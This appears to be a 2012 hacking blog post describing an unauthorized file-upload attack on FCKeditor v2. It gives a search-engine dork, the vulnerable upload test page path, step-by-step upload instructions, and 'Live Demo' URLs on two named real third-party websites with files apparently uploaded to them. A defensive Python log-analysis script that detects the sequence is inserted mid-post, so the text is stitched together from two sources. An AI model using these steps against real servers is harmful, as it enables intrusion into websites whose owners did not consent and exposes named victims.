Thursday, February 2, 2012

FCKeditor v2 remote File Upload Exploit



Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html

First, enter the Google dork.
Dork: intitle:"FCKeditor - Uploaders Tests"

After that, you will get the FCKeditor upload option.
Open the exploit URL as shown:
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
In the file uploader, select PHP.
You can then upload a .txt file. Some sites also allow .html and .jpg files to be uploaded.
If the file you uploaded really went through, the message "File uploaded with no errors" will appear.

result:
http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Go to the address above.
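
The sequence above leaves a recognisable trail in web server access logs. The following is an added example, not part of the original post: for each client it correlates a request for uploadtest.html, a POST under the connectors directory, and a later fetch from /userfiles/. The log lines, IP addresses and the php/upload.php handler path in the sample are constructed assumptions.

```python
import re

# Constructed sample access-log lines (common log format). IPs are documentation
# ranges; the php/upload.php handler path is an assumption for illustration.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Feb/2012:10:01:11 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 5120
203.0.113.7 - - [02/Feb/2012:10:01:40 +0000] "POST /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 310
203.0.113.7 - - [02/Feb/2012:10:01:52 +0000] "GET /userfiles/aaaa.txt HTTP/1.1" 200 12
198.51.100.4 - - [02/Feb/2012:10:02:03 +0000] "GET /userfiles/logo.jpg HTTP/1.1" 200 48211
198.51.100.9 - - [02/Feb/2012:10:03:15 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 210
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
TEST_PAGE = re.compile(r"/editor/filemanager/connectors/uploadtest\.html$", re.I)
CONNECTOR = re.compile(r"/editor/filemanager/connectors/", re.I)
USERFILES = re.compile(r"/userfiles/", re.I)
RANK = {"scan": 0, "exposed": 1, "upload": 2, "upload+fetch": 3}


def analyze(log_text):
    """Map each client IP to the furthest stage of the sequence it reached."""
    stage = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, url, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        path = url.split("?", 1)[0]
        ok = 200 <= status < 300
        seen = stage.get(ip)
        new = None
        if method == "GET" and TEST_PAGE.search(path):
            # 2xx means the test page is still deployed; anything else is a miss.
            new = "exposed" if ok else "scan"
        elif method == "POST" and ok and CONNECTOR.search(path) and seen == "exposed":
            # Editors also POST to the connector, so only count it after a test-page hit.
            new = "upload"
        elif method == "GET" and ok and USERFILES.search(path) and seen == "upload":
            new = "upload+fetch"
        if new and RANK[new] > RANK.get(seen, -1):
            stage[ip] = new
    return stage


if __name__ == "__main__":
    for ip, reached in sorted(analyze(SAMPLE_LOG).items()):
        print(f"{ip}\t{reached}")
```

Any client reported as "exposed" or later means uploadtest.html is still reachable on the server and should be removed along with any unused connectors.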

Live Demo


http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result 


http://www.relationshiptrends.com/affiliate/img/aaaa.txt
http://minisite.nku.edu.tr//userfiles/aaaa.txt 

good luck;;;;;;;;;;;
shwekoyantaw